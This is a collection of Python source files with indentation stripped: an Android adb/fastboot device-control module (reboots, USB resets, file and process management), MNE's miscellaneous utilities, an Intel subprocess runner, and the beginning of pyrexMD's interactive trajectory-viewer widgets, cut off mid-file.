"""Return fastboot command line for running a fastboot command."""
fastboot_cmd_line = '%s %s' % (get_fastboot_path(), fastboot_cmd)
return fastboot_cmd_line
def get_fastboot_path():
"""Return path to fastboot binary."""
return os.path.join(environment.get_platform_resources_directory(),
'fastboot')
def get_file_checksum(file_path):
"""Return file's md5 checksum."""
if not file_exists(file_path):
return None
return run_shell_command(['md5sum', '-b', file_path])
def get_file_size(file_path):
"""Return file's size."""
if not file_exists(file_path):
return None
return int(run_shell_command(['stat', '-c%s', file_path]))
def get_kernel_log_content():
"""Return content of kernel logs."""
kernel_log_content = ''
for kernel_log_file in KERNEL_LOG_FILES:
kernel_log_content += read_data_from_file(kernel_log_file) or ''
return kernel_log_content
def get_ps_output():
"""Return ps output for all processes."""
return run_shell_command(['ps', '-A'])
def get_process_and_child_pids(process_name):
"""Return process and child pids matching a process name."""
pids = []
ps_output_lines = get_ps_output().splitlines()
while True:
old_pids_length = len(pids)
for line in ps_output_lines:
data = line.split()
# Make sure we have a valid pid and parent pid.
try:
# PID is in the second column.
line_process_pid = int(data[1])
# Parent PID is in the third column.
line_parent_pid = int(data[2])
except:
continue
# If we have already processed this pid, no more work to do.
if line_process_pid in pids:
continue
# Process name is in the last column.
# Monkey framework instances (if any) are children of our process launch,
# so include these in pid list.
line_process_name = data[-1]
if (process_name in line_process_name or
MONKEY_PROCESS_NAME in line_process_name):
if process_name == line_process_name:
pids.insert(0, line_process_pid)
else:
pids.append(line_process_pid)
continue
# Add child pids to end.
if line_parent_pid in pids:
pids.append(line_process_pid)
new_pids_length = len(pids)
if old_pids_length == new_pids_length:
break
return pids
def get_property(property_name):
"""Return property's value."""
return run_shell_command(['getprop', property_name])
def hard_reset():
"""Perform a hard reset of the device."""
if is_gce() or environment.is_android_emulator():
# There is no recovery step at this point for a gce bot, so just exit
# and wait for reimage on next iteration.
bad_state_reached()
# For physical device.
# Try hard-reset via sysrq-trigger (requires root).
hard_reset_sysrq_cmd = get_adb_command_line(
'shell echo b \\> /proc/sysrq-trigger')
execute_command(hard_reset_sysrq_cmd, timeout=RECOVERY_CMD_TIMEOUT)
# Try soft-reset now (does not require root).
soft_reset_cmd = get_adb_command_line('reboot')
execute_command(soft_reset_cmd, timeout=RECOVERY_CMD_TIMEOUT)
def is_gce():
"""Returns if we are running in GCE environment."""
android_serial = environment.get_value('ANDROID_SERIAL')
return android_serial.startswith('127.0.0.1:')
def kill_processes_and_children_matching_name(process_name):
"""Kills process along with children matching names."""
process_and_child_pids = get_process_and_child_pids(process_name)
if not process_and_child_pids:
return
kill_command = ['kill', '-9'] + process_and_child_pids
run_shell_command(kill_command)
def read_data_from_file(file_path):
"""Return device's file content."""
if not file_exists(file_path):
return None
return run_shell_command(['cat', '"%s"' % file_path])
def reboot():
"""Reboots device."""
run_command('reboot')
def start_gce_device():
"""Start the gce device."""
cvd_dir = environment.get_value('CVD_DIR')
cvd_bin_dir = os.path.join(cvd_dir, 'bin')
launch_cvd_path = os.path.join(cvd_bin_dir, 'launch_cvd')
device_memory_mb = environment.get_value('DEVICE_MEMORY_MB',
DEFAULT_DEVICE_MEMORY_MB)
launch_cvd_command_line = (
'{launch_cvd_path} -daemon -memory_mb {device_memory_mb}'.format(
launch_cvd_path=launch_cvd_path, device_memory_mb=device_memory_mb))
execute_command(launch_cvd_command_line)
def stop_gce_device():
"""Stops the gce device."""
cvd_dir = environment.get_value('CVD_DIR')
cvd_bin_dir = os.path.join(cvd_dir, 'bin')
stop_cvd_path = os.path.join(cvd_bin_dir, 'stop_cvd')
execute_command(stop_cvd_path, timeout=RECOVERY_CMD_TIMEOUT)
time.sleep(STOP_CVD_WAIT)
def recreate_gce_device():
"""Recreate gce device, restoring from backup images."""
logs.log('Reimaging gce device.')
cvd_dir = environment.get_value('CVD_DIR')
stop_gce_device()
# Delete all existing images.
image_dir = cvd_dir
for image_file_path in glob.glob(os.path.join(image_dir, '*.img')):
shell.remove_file(image_file_path)
# Restore images from backup.
backup_image_dir = os.path.join(cvd_dir, 'backup')
for image_filename in os.listdir(backup_image_dir):
image_src = os.path.join(backup_image_dir, image_filename)
image_dest = os.path.join(image_dir, image_filename)
shell.copy_file(image_src, image_dest)
start_gce_device()
def remount():
"""Remount /system as read/write."""
run_as_root()
run_command('remount')
wait_for_device()
run_as_root()
def remove_directory(device_directory, recreate=False):
"""Delete everything inside of a device directory and recreate if needed."""
run_shell_command('rm -rf %s' % device_directory, root=True)
if recreate:
create_directory_if_needed(device_directory)
def remove_file(file_path):
"""Remove file."""
run_shell_command('rm -f %s' % file_path, root=True)
def reset_device_connection():
"""Reset the connection to the physical device through USB. Returns whether
or not the reset succeeded."""
if is_gce():
stop_gce_device()
start_gce_device()
else:
# Physical device. Try restarting usb.
reset_usb()
# Check device status.
state = get_device_state()
if state != 'device':
logs.log_warn('Device state is %s, unable to recover using usb reset/'
'gce reconnect.' % str(state))
return False
return True
def get_device_path():
"""Gets a device path to be cached and used by reset_usb."""
def _get_usb_devices():
"""Returns a list of device objects containing a serial and USB path."""
usb_list_cmd = 'lsusb -v'
output = execute_command(usb_list_cmd, timeout=RECOVERY_CMD_TIMEOUT)
if output is None:
logs.log_error('Failed to populate usb devices using lsusb, '
'host restart might be needed.')
bad_state_reached()
devices = []
path = None
for line in output.splitlines():
match = LSUSB_BUS_RE.match(line)
if match:
path = '/dev/bus/usb/%s/%s' % (match.group(1), match.group(2))
continue
match = LSUSB_SERIAL_RE.match(line)
if path and match and match.group(1):
serial = match.group(1)
devices.append(DEVICE(serial, path))
return devices
def _get_device_path_for_serial():
"""Return device path. Assumes a simple ANDROID_SERIAL."""
devices = _get_usb_devices()
for device in devices:
if device_serial == device.serial:
return device.path
return None
def _get_device_path_for_usb():
"""Returns a device path.
Assumes ANDROID_SERIAL in the form "usb:<identifier>"."""
# Android serial may reference a usb device rather than a serial number.
device_id = device_serial[len('usb:'):]
bus_number = int(
open('/sys/bus/usb/devices/%s/busnum' % device_id).read().strip())
device_number = int(
open('/sys/bus/usb/devices/%s/devnum' % device_id).read().strip())
return '/dev/bus/usb/%03d/%03d' % (bus_number, device_number)
if is_gce():
return None
device_serial = environment.get_value('ANDROID_SERIAL')
if device_serial.startswith('usb:'):
return _get_device_path_for_usb()
return _get_device_path_for_serial()
def reset_usb():
"""Reset USB bus for a device serial."""
if is_gce() or environment.is_android_emulator():
# Nothing to do here.
return True
# App Engine does not let us import this.
import fcntl
# We need to get latest device path since it could be changed in reboots or
# adb root restarts.
try:
device_path = get_device_path()
except IOError:
# We may reach this state if the device is no longer available.
device_path = None
if not device_path:
# Try pulling from cache (if available).
device_path = environment.get_value('DEVICE_PATH')
if not device_path:
logs.log_warn('No device path found, unable to reset usb.')
return False
try:
with open(device_path, 'w') as f:
fcntl.ioctl(f, USBDEVFS_RESET)
except:
logs.log_warn('Failed to reset usb.')
return False
# Wait for usb to recover.
wait_for_device(recover=False)
return True
def revert_asan_device_setup_if_needed():
"""Reverts ASan device setup if installed."""
if not environment.get_value('ASAN_DEVICE_SETUP'):
return
device_id = environment.get_value('ANDROID_SERIAL')
device_argument = '--device %s' % device_id
revert_argument = '--revert'
asan_device_setup_script_path = os.path.join(
environment.get_platform_resources_directory(), 'third_party',
'asan_device_setup.sh')
command = '%s %s %s' % (asan_device_setup_script_path, device_argument,
revert_argument)
execute_command(command, timeout=RECOVERY_CMD_TIMEOUT)
def run_as_root():
"""Restart adbd and runs as root."""
# Check if we are already running as root. If yes bail out.
if get_property('service.adb.root') == '1':
return
wait_for_device()
run_command('root')
wait_for_device()
def run_command(cmd,
log_output=False,
log_error=True,
timeout=None,
recover=True):
"""Run a command in adb shell."""
if isinstance(cmd, list):
cmd = ' '.join([str(i) for i in cmd])
if log_output:
logs.log('Running: adb %s' % cmd)
if not timeout:
timeout = ADB_TIMEOUT
output = execute_command(get_adb_command_line(cmd), timeout, log_error)
if not recover or environment.is_android_emulator():
if log_output:
logs.log('Output: (%s)' % output)
return output
device_not_found_string_with_serial = DEVICE_NOT_FOUND_STRING.format(
serial=environment.get_value('ANDROID_SERIAL'))
if (output in [
DEVICE_HANG_STRING, DEVICE_OFFLINE_STRING,
device_not_found_string_with_serial
]):
logs.log_warn('Unable to query device, resetting device connection.')
if reset_device_connection():
# Device has successfully recovered, re-run command to get output.
# Continue execution and validate output next for |None| condition.
output = execute_command(get_adb_command_line(cmd), timeout, log_error)
else:
output = DEVICE_HANG_STRING
if output is DEVICE_HANG_STRING:
# Handle the case where our command execution hung. This is usually when
# device goes into a bad state and only way to recover is to restart it.
logs.log_warn('Unable to query device, restarting device to recover.')
hard_reset()
# Wait until we've booted and try the command again.
wait_until_fully_booted()
output = execute_command(get_adb_command_line(cmd), timeout, log_error)
if log_output:
logs.log('Output: (%s)' % output)
return output
def run_shell_command(cmd,
log_output=False,
log_error=True,
root=False,
timeout=None,
recover=True):
"""Run adb shell command (with root if needed)."""
def _escape_specials(command):
return command.replace('\\', '\\\\').replace('"', '\\"')
if isinstance(cmd, list):
cmd = ' '.join([str(i) for i in cmd])
if cmd[0] not in ['"', "'"]:
cmd = '"{}"'.format(_escape_specials(cmd))
if root:
root_cmd_prefix = 'su root sh -c '
# The arguments to adb shell need to be quoted, so if we're using
# su root sh -c, quote the combined command
full_cmd = 'shell \'{}{}\''.format(root_cmd_prefix, cmd)
else:
full_cmd = 'shell {}'.format(cmd)
return run_command(
full_cmd,
log_output=log_output,
log_error=log_error,
timeout=timeout,
recover=recover)
def run_fastboot_command(cmd, log_output=True, log_error=True, timeout=None):
"""Run a command in fastboot shell."""
if is_gce():
# We can't run fastboot commands on Android GCE instances.
return None
if isinstance(cmd, list):
cmd = ' '.join([str(i) for i in cmd])
if log_output:
logs.log('Running: fastboot %s' % cmd)
if not timeout:
timeout = ADB_TIMEOUT
output = execute_command(get_fastboot_command_line(cmd), timeout, log_error)
return output
def setup_adb():
"""Sets up ADB binary for use."""
adb_binary_path = get_adb_path()
# Make sure that ADB env var is set.
if not environment.get_value('ADB'):
environment.set_value('ADB', adb_binary_path)
def start_shell():
"""Stops shell."""
# Make sure we are running as root.
run_as_root()
run_shell_command('start')
wait_until_fully_booted()
def stop_shell():
"""Stops shell."""
# Make sure we are running as root.
run_as_root()
run_shell_command('stop')
def time_since_last_reboot():
"""Return time in seconds since last reboot."""
uptime_string = run_shell_command(['cat', '/proc/uptime']).split(' ')[0]
try:
return float(uptime_string)
except ValueError:
# Sometimes, adb can just hang or return null output. In these cases, just
# return infinity uptime value.
return float('inf')
def wait_for_device(recover=True):
"""Waits indefinitely for the device to come online."""
run_command('wait-for-device', timeout=RECOVERY_CMD_TIMEOUT, recover=recover)
def wait_until_fully_booted():
"""Wait until device is fully booted or timeout expires."""
def boot_completed():
expected = '1'
result = run_shell_command('getprop sys.boot_completed', log_error=False)
return result == expected
def drive_ready():
expected = '0'
result = run_shell_command('\'test -d "/"; echo $?\'', log_error=False)
return result == expected
def package_manager_ready():
expected = 'package:/system/framework/framework-res.apk'
result = run_shell_command('pm path android', log_error=False)
if not result:
return False
# Ignore any extra messages before or after the result we want.
return expected in result.splitlines()
# Make sure we are not already recursing inside this function.
if utils.is_recursive_call():
return False
# Wait until device is online.
wait_for_device()
start_time = time.time()
is_boot_completed = False
is_drive_ready = False
is_package_manager_ready = False
while time.time() - start_time < REBOOT_TIMEOUT:
# TODO(mbarbella): Investigate potential optimizations.
# The package manager check should also work for shell restarts.
if not is_drive_ready:
is_drive_ready = drive_ready()
if not is_package_manager_ready:
is_package_manager_ready = package_manager_ready()
if not is_boot_completed:
is_boot_completed = boot_completed()
if is_drive_ready and is_package_manager_ready and is_boot_completed:
return True
time.sleep(BOOT_WAIT_INTERVAL)
factory_reset()
logs.log_fatal_and_exit(
'Device failed to finish boot. Reset to factory settings and exited.')
# Not reached.
return False
def write_command_line_file(command_line, app_path):
"""Write command line file with command line argument for the application."""
command_line_path = environment.get_value('COMMAND_LINE_PATH')
if not command_line_path:
return
# Algorithm for filtering current command line.
# 1. Remove |APP_PATH| from front.
# 2. Add 'chrome ' to start.
# 3. Strip for whitespaces at start and end.
command_line_without_app_path = command_line.replace('%s ' % app_path, '')
command_line_file_contents = 'chrome %s' % (
command_line_without_app_path.strip())
write_data_to_file(command_line_file_contents, command_line_path)
def write_data_to_file(contents, file_path):
"""Writes content to file."""
# If this is a file in /system, we need to remount /system as read-write and
# after file is written, revert it back to read-only.
is_system_file = file_path.startswith('/system')
if is_system_file:
remount()
# Write file with desired contents.
run_shell_command("\"echo -n '%s' | su root dd of=%s\"" % (contents.replace(
'"', '\\"'), file_path))
# Make command line file is readable.
run_shell_command('chmod 0644 %s' % file_path, root=True)
if is_system_file:
reboot()
wait_until_fully_booted()
|
misc.py
|
# -*- coding: utf-8 -*-
"""Some miscellaneous utility functions."""
# Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr>
#
# License: BSD-3-Clause
from contextlib import contextmanager
import fnmatch
import gc
import inspect
from math import log
import os
from queue import Queue, Empty
from string import Formatter
import subprocess
import sys
from threading import Thread
import traceback
import numpy as np
from ..utils import _check_option, _validate_type
from ..fixes import _get_args
from ._logging import logger, verbose, warn
def _pl(x, non_pl=''):
"""Determine if plural should be used."""
len_x = x if isinstance(x, (int, np.generic)) else len(x)
return non_pl if len_x == 1 else 's'
def _explain_exception(start=-1, stop=None, prefix='> '):
"""Explain an exception."""
# start=-1 means "only the most recent caller"
etype, value, tb = sys.exc_info()
string = traceback.format_list(traceback.extract_tb(tb)[start:stop])
string = (''.join(string).split('\n') +
traceback.format_exception_only(etype, value))
string = ':\n' + prefix + ('\n' + prefix).join(string)
return string
def _sort_keys(x):
"""Sort and return keys of dict."""
keys = list(x.keys()) # note: not thread-safe
idx = np.argsort([str(k) for k in keys])
keys = [keys[ii] for ii in idx]
return keys
class _DefaultEventParser:
"""Parse none standard events."""
def __init__(self):
self.event_ids = dict()
def __call__(self, description, offset=1):
if description not in self.event_ids:
self.event_ids[description] = offset + len(self.event_ids)
return self.event_ids[description]
class _FormatDict(dict):
"""Help pformat() work properly."""
def __missing__(self, key):
return "{" + key + "}"
def pformat(temp, **fmt):
"""Format a template string partially.
Examples
--------
>>> pformat("{a}_{b}", a='x')
'x_{b}'
"""
formatter = Formatter()
mapping = _FormatDict(fmt)
return formatter.vformat(temp, (), mapping)
def _enqueue_output(out, queue):
for line in iter(out.readline, b''):
queue.put(line)
@verbose
def run_subprocess(command, return_code=False, verbose=None, *args, **kwargs):
"""Run command using subprocess.Popen.
Run command and wait for command to complete. If the return code was zero
then return, otherwise raise CalledProcessError.
By default, this will also add stdout= and stderr=subproces.PIPE
to the call to Popen to suppress printing to the terminal.
Parameters
----------
command : list of str | str
Command to run as subprocess (see subprocess.Popen documentation).
return_code : bool
If True, return the return code instead of raising an error if it's
non-zero.
.. versionadded:: 0.20
%(verbose)s
*args, **kwargs : arguments
Additional arguments to pass to subprocess.Popen.
Returns
-------
stdout : str
Stdout returned by the process.
stderr : str
Stderr returned by the process.
code : int
The return code, only returned if ``return_code == True``.
"""
all_out = ''
all_err = ''
# non-blocking adapted from https://stackoverflow.com/questions/375427/non-blocking-read-on-a-subprocess-pipe-in-python#4896288 # noqa: E501
out_q = Queue()
err_q = Queue()
with running_subprocess(command, *args, **kwargs) as p, p.stdout, p.stderr:
out_t = Thread(target=_enqueue_output, args=(p.stdout, out_q))
err_t = Thread(target=_enqueue_output, args=(p.stderr, err_q))
out_t.daemon = True
err_t.daemon = True
out_t.start()
err_t.start()
while True:
do_break = p.poll() is not None
# read all current lines without blocking
while True:
try:
out = out_q.get(timeout=0.01)
except Empty:
break
else:
out = out.decode('utf-8')
logger.info(out)
all_out += out
while True:
try:
err = err_q.get(timeout=0.01)
except Empty:
break
else:
err = err.decode('utf-8')
# Leave this as logger.warning rather than warn(...) to
# mirror the logger.info above for stdout. This function
# is basically just a version of subprocess.call, and
# shouldn't emit Python warnings due to stderr outputs
# (the calling function can check for stderr output and
# emit a warning if it wants).
logger.warning(err)
all_err += err
if do_break:
break
output = (all_out, all_err)
if return_code:
output = output + (p.returncode,)
elif p.returncode:
print(output)
err_fun = subprocess.CalledProcessError.__init__
if 'output' in _get_args(err_fun):
raise subprocess.CalledProcessError(p.returncode, command, output)
else:
raise subprocess.CalledProcessError(p.returncode, command)
return output
@contextmanager
def running_subprocess(command, after="wait", verbose=None, *args, **kwargs):
"""Context manager to do something with a command running via Popen.
Parameters
----------
command : list of str | str
Command to run as subprocess (see :class:`python:subprocess.Popen`).
after : str
Can be:
- "wait" to use :meth:`~python:subprocess.Popen.wait`
- "communicate" to use :meth:`~python.subprocess.Popen.communicate`
- "terminate" to use :meth:`~python:subprocess.Popen.terminate`
- "kill" to use :meth:`~python:subprocess.Popen.kill`
%(verbose)s
*args, **kwargs : arguments
Additional arguments to pass to subprocess.Popen.
Returns
-------
p : instance of Popen
The process.
"""
_validate_type(after, str, 'after')
_check_option('after', after, ['wait', 'terminate', 'kill', 'communicate'])
for stdxxx, sys_stdxxx in (['stderr', sys.stderr], ['stdout', sys.stdout]):
if stdxxx not in kwargs:
kwargs[stdxxx] = subprocess.PIPE
# Check the PATH environment variable. If run_subprocess() is to be called
# frequently this should be refactored so as to only check the path once.
env = kwargs.get('env', os.environ)
if any(p.startswith('~') for p in env['PATH'].split(os.pathsep)):
warn('Your PATH environment variable contains at least one path '
'starting with a tilde ("~") character. Such paths are not '
'interpreted correctly from within Python. It is recommended '
'that you use "$HOME" instead of "~".')
if isinstance(command, str):
command_str = command
else:
command = [str(s) for s in command]
command_str = ' '.join(s for s in command)
logger.info("Running subprocess: %s" % command_str)
try:
p = subprocess.Popen(command, *args, **kwargs)
except Exception:
if isinstance(command, str):
command_name = command.split()[0]
else:
command_name = command[0]
logger.error('Command not found: %s' % command_name)
raise
try:
yield p
finally:
getattr(p, after)()
p.wait()
def _clean_names(names, remove_whitespace=False, before_dash=True):
"""Remove white-space on topo matching.
This function handles different naming
conventions for old VS new VectorView systems (`remove_whitespace`).
Also it allows to remove system specific parts in CTF channel names
(`before_dash`).
Usage
-----
# for new VectorView (only inside layout)
ch_names = _clean_names(epochs.ch_names, remove_whitespace=True)
# for CTF
ch_names = _clean_names(epochs.ch_names, before_dash=True)
"""
cleaned = []
for name in names:
if ' ' in name and remove_whitespace:
name = name.replace(' ', '')
if '-' in name and before_dash:
name = name.split('-')[0]
if name.endswith('_v'):
name = name[:-2]
cleaned.append(name)
return cleaned
def _get_argvalues():
"""Return all arguments (except self) and values of read_raw_xxx."""
# call stack
# read_raw_xxx -> <decorator-gen-000> -> BaseRaw.__init__ -> _get_argvalues
# This is equivalent to `frame = inspect.stack(0)[4][0]` but faster
frame = inspect.currentframe()
try:
for _ in range(3):
frame = frame.f_back
fname = frame.f_code.co_filename
if not fnmatch.fnmatch(fname, '*/mne/io/*'):
return None
args, _, _, values = inspect.getargvalues(frame)
finally:
del frame
params = dict()
for arg in args:
params[arg] = values[arg]
params.pop('self', None)
return params
def sizeof_fmt(num):
"""Turn number of bytes into human-readable str.
Parameters
----------
num : int
The number of bytes.
Returns
-------
size : str
The size in human-readable format.
"""
units = ['bytes', 'kB', 'MB', 'GB', 'TB', 'PB']
decimals = [0, 0, 1, 2, 2, 2]
if num > 1:
exponent = min(int(log(num, 1024)), len(units) - 1)
quotient = float(num) / 1024 ** exponent
unit = units[exponent]
num_decimals = decimals[exponent]
format_string = '{0:.%sf} {1}' % (num_decimals)
return format_string.format(quotient, unit)
if num == 0:
return '0 bytes'
if num == 1:
return '1 byte'
def _file_like(obj):
# An alternative would be::
#
# isinstance(obj, (TextIOBase, BufferedIOBase, RawIOBase, IOBase))
#
# but this might be more robust to file-like objects not properly
# inheriting from these classes:
return all(callable(getattr(obj, name, None)) for name in ('read', 'seek'))
def _assert_no_instances(cls, when=''):
__tracebackhide__ = True
n = 0
ref = list()
gc.collect()
objs = gc.get_objects()
for obj in objs:
try:
check = isinstance(obj, cls)
except Exception: # such as a weakref
check = False
if check:
rr = gc.get_referrers(obj)
count = 0
for r in rr:
if r is not objs and \
r is not globals() and \
r is not locals() and \
not inspect.isframe(r):
if isinstance(r, (list, dict)):
rep = f'len={len(r)}'
r_ = gc.get_referrers(r)
types = (x.__class__.__name__ for x in r_)
types = "/".join(sorted(set(
x for x in types if x is not None)))
rep += f', {len(r_)} referrers: {types}'
del r_
else:
rep = repr(r)[:100].replace('\n', ' ')
ref.append(f'{r.__class__.__name__}: {rep}')
count += 1
del r
del rr
n += count > 0
assert n == 0, f'{n} {when}:\n' + '\n'.join(ref)
def _resource_path(submodule, filename):
"""Return a full system path to a package resource (AKA a file).
Parameters
----------
submodule : str
An import-style module or submodule name
(e.g., "mne.datasets.testing").
filename : str
The file whose full path you want.
Returns
-------
path : str
The full system path to the requested file.
"""
try:
from importlib.resources import files
return files(submodule).joinpath(filename)
except ImportError:
from pkg_resources import resource_filename
return resource_filename(submodule, filename)
|
runners.py
|
"""
Copyright (c) 2020 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import signal
import subprocess
import sys
import time
from queue import Empty, Queue
from threading import Thread
from .misc import log_shell_cmd
class NonBlockingStreamReader:
def __init__(self, stream):
self.stream = stream
self.queue = Queue()
def populate_queue(stream, queue):
while True:
line = stream.readline()
if line:
queue.put(line)
else:
time.sleep(1)
self.thread = Thread(target=populate_queue, args=(self.stream, self.queue))
self.thread.daemon = True
self.thread.start()
def readline(self, timeout=None):
try:
return self.queue.get(block=timeout is not None, timeout=timeout)
except Empty:
return None
def run_with_termination(cmd):
log_shell_cmd(cmd, 'Running with termination the command')
process = subprocess.Popen(cmd, stderr=subprocess.PIPE)
nbsr_err = NonBlockingStreamReader(process.stderr)
failure_word = 'CUDA out of memory'
while process.poll() is None:
stderr = nbsr_err.readline(0.1)
if stderr is None:
time.sleep(1)
continue
stderr = stderr.decode('utf-8')
print(stderr, end='')
sys.stdout.flush()
if failure_word in stderr:
try:
print('\nTerminated because of:', failure_word)
os.killpg(os.getpgid(process.pid), signal.SIGTERM)
except ProcessLookupError as e:
print(e)
while True:
stderr = nbsr_err.readline(0.1)
if not stderr:
break
stderr = stderr.decode('utf-8')
print(stderr, end='')
sys.stdout.flush()
time.sleep(1)
err = f'Out of memory: Killed process {process.pid}'
proc = subprocess.Popen(['dmesg', '-l', 'err'], stdout=subprocess.PIPE)
out = proc.communicate()[0].decode().split('\n')
for line in out:
if err in line:
raise RuntimeError(line)
|
core.py
|
# @Author: Arthur Voronin
# @Date: 17.04.2021
# @Filename: core.py
# @Last modified by: arthur
# @Last modified time: 16.09.2021
"""
.. hint:: This module contains functions enabling interactive analyses. Its main
parts are the iPlayer and iPlot classes, which allow the use of a trajectory
viewer or a dynamic linking of the trajectory viewer and any 2D graph.
Example:
--------
.. code-block:: python
import MDAnalysis as mda
import pyrexMD.misc as misc
import pyrexMD.core as core
import pyrexMD.analysis.contacts as con
ref = mda.Universe("<pdb_file>")
mobile = mda.Universe("<tpr_file>", "<xtc_file>")
# show ref structure in trajectory viewer
tv = core.iPlayer(ref)
tv()
# check for formed bias contacts
bias = misc.read_file("path/to/bias/contacts", usecols=(0,1))
FRAMES, QBIAS, CM = con.get_Qbias(mobile, bias)
# interactive plot (ctrl-click into the plot to jump to frame)
ip = core.iPlot(u1, xdata=FRAMES, ydata=QBIAS, xlabel="frame", ylabel="Qbias")
ip()
Content:
--------
"""
# core module
from builtins import super
from IPython.display import display
import ipywidgets as wg
import numpy as np
import nglview as ngl
import MDAnalysis as mda
import matplotlib
import matplotlib.pyplot as plt
import seaborn as sns
import pyperclip # copy&paste to clipboard
import threading
import time
# global update for plots
matplotlib.rcParams.update({'font.family': "sans-serif", 'font.weight': "normal", 'font.size': 16})
cp = sns.color_palette()
"""
access seaborn colors via core.cp[0] - core.cp[9]
"""
# TODO: get_color_scheme for any component after checking the lengh of the component (instead of universe?)
# TODO: if if if -> if elif else
class iColor(object):
def __init__(self, iPlayer_cls):
self._iPlayer = iPlayer_cls
return
def get_color_scheme(self, color, universe=None):
"""
Returns color scheme.
Args:
color (str)
universe (universe, atomgrp)
Returns:
color_scheme (array)
HEX colors for each RES taken from iPlayer.universe (default) or universe.
Accepted colors (simple):
| 'red' 'black'
| 'orange' 'grey_80'
| 'yellow' 'grey_60'
| 'green' 'grey_40'
| 'cyan' 'grey_20'
| 'blue' 'white'
| 'purple'
| 'magenta'
Accepted colors (complex):
| 'baw': black and white
| 'b/w': black and white
| 'rainbow': red to magenta
"""
color = str(color)
if universe != None:
length = len(universe.residues)
else:
length = len(self._iPlayer.universe.residues)
# simple color schemes
color_scheme_s = {'red': ['0xFF0000'],
'orange': ['0xFF9900'],
'yellow': ['0xFFFF00'],
'green': ['0x00FF00'],
'cyan': ['0x00FFFF'],
'blue': ['0x0000FF'],
'purple': ['0x9900FF'],
'magenta': ['0xFF00FF'],
'black': ['0x000000'],
'grey_80': ['0x444444'],
'grey_60': ['0x666666'],
'grey_40': ['0x999999'],
'grey_20': ['0xCCCCCC'],
'white': ['0xFFFFFF']
}
# complex color schemes
color_scheme_c = {'rainbow': [color_scheme_s['red'],
color_scheme_s['orange'],
color_scheme_s['yellow'],
color_scheme_s['green'],
color_scheme_s['cyan'],
color_scheme_s['blue'],
color_scheme_s['purple'],
color_scheme_s['magenta']],
'baw': [color_scheme_s['black'],
color_scheme_s['grey_80'],
color_scheme_s['grey_60'],
color_scheme_s['grey_40'],
color_scheme_s['grey_20'],
color_scheme_s['white']],
'b/w': [color_scheme_s['black'],
color_scheme_s['grey_80'],
color_scheme_s['grey_60'],
color_scheme_s['grey_40'],
color_scheme_s['grey_20'],
color_scheme_s['white']]
}
# simple
if color in color_scheme_s:
color_scheme = color_scheme_s[color] * length
# complex
elif color in color_scheme_c:
color_scheme = color_scheme_c[color]
if length % len(color_scheme) == 0:
repeat = length / len(color_scheme)
else:
repeat = 1 + length / len(color_scheme)
color_scheme = list(np.repeat(color_scheme, repeat))
# non-existing color schemes
else:
print("Color scheme does not exist!")
return(color_scheme)
def set_color_scheme(self, color, ci=None):
"""
Applies color scheme. If ci=None, then target is determinded by <iPlayer_object>.widgets.Components.description.
Args:
color (str)
universe (universe, atomgrp)
Returns:
color_scheme (array)
HEX colors for each RES taken from iPlayer.universe (default) or universe.
Accepted colors (simple):
| 'red' 'black'
| 'orange' 'grey_80'
| 'yellow' 'grey_60'
| 'green' 'grey_40'
| cyan' 'grey_20'
| 'blue' 'white'
| 'purple'
| 'magenta'
Accepted colors (complex):
| 'baw': black and white
| 'b/w': black and white
| 'rainbow': red to magenta
"""
color_schemes = ['red', 'yellow', 'orange', 'green',
'cyan', 'blue', 'purple', 'magenta',
'black', 'grey_80', 'grey_60', 'grey_40',
'grey_20', 'white', 'baw', 'b/w', 'rainbow']
color_scheme_str = None
# check for existing color schemes
if color in color_schemes:
color_scheme_str = color
color = self.get_color_scheme(color)
# update dict / remember color scheme
if ci == None:
ci = self._iPlayer.widgets.Components.description.split()[-1]
if color_scheme_str != None:
if ci == '0':
self._iPlayer.widgets._dict_Component_0['Color_Scheme'] = color_scheme_str
elif ci == '1':
self._iPlayer.widgets._dict_Component_1['Color_Scheme'] = color_scheme_str
else:
if ci == '0':
self._iPlayer.widgets._dict_Component_0['Color_Scheme'] = color
elif ci == '1':
self._iPlayer.widgets._dict_Component_1['Color_Scheme'] = color
# apply color scheme
for ri in range(0, 5):
self._iPlayer.player._set_color_by_residue(color, component_index=ci, repr_index=ri)
return
class iWidgets(object):
def __init__(self, iPlayer_cls):
# align via wg.<type>(..., **.align_kw)
align_kw = dict(_css=(('.widget-label', 'min-width', '20ex'),),
margin='0px 0px 5px 12px')
# Marie stuff start
self.YValue = wg.Button(description='', tooltip='click: find global minimum')
self.FrameTime = wg.Button(description='Time: ' + str(0) + ' ps', tooltip='click: switch between Time and Frame')
# Marie stuff end
self.Frame = wg.ToggleButton(value=False, description='Frame: ' + str(0),
button_style='', tooltip='click: copy frame to clipboard', disabled=False)
self.Time = wg.ToggleButton(value=False, description='Time: ' + str(0) + ' ps',
button_style='', tooltip='click: copy time to clipboard', disabled=False)
self.Reset = wg.ToggleButton(value=False, description='Reset View', button_style='')
self.UI = wg.ToggleButton(value=False, description='Hide UI')
self.PlayerStep = wg.IntSlider(value=1, min=1, max=500, description='Step',
layout=wg.Layout(width='230px'), **align_kw)
self.Components = wg.ToggleButton(value=False, description='Component 0', button_style='info')
self._Component_0 = wg.ToggleButton(value=False, description='Component 0', button_style='',
layout=wg.Layout(display='none'))
self._Component_1 = wg.ToggleButton(value=False, description='Component 1', button_style='',
layout=wg.Layout(display='none'))
self.Representation = wg.ToggleButton(value=False, description='Representation', button_style='info')
self._Cartoon = wg.ToggleButton(value=True, description='Cartoon', button_style='',
layout=wg.Layout(display='none'))
self._BaS = wg.ToggleButton(value=False, description='Ball & Stick', button_style='',
layout=wg.Layout(display='none'))
self._Surface = wg.ToggleButton(value=False, description='Surface', button_style='',
layout=wg.Layout(display='none'))
self._Visibility = wg.ToggleButton(value=True, description='Visibility')
self.Color = wg.ToggleButton(value=False, description='Color', button_style='info')
self.Color_by_RES = wg.ToggleButton(value=False, description='Color by RES', button_style='')
self._Color_red = wg.ToggleButton(value=False, description='Red', button_style='',
layout=wg.Layout(display='none'))
self._Color_orange = wg.ToggleButton(value=False, description='Orange', button_style='',
layout=wg.Layout(display='none'))
self._Color_yellow = wg.ToggleButton(value=False, description='Yellow', button_style='',
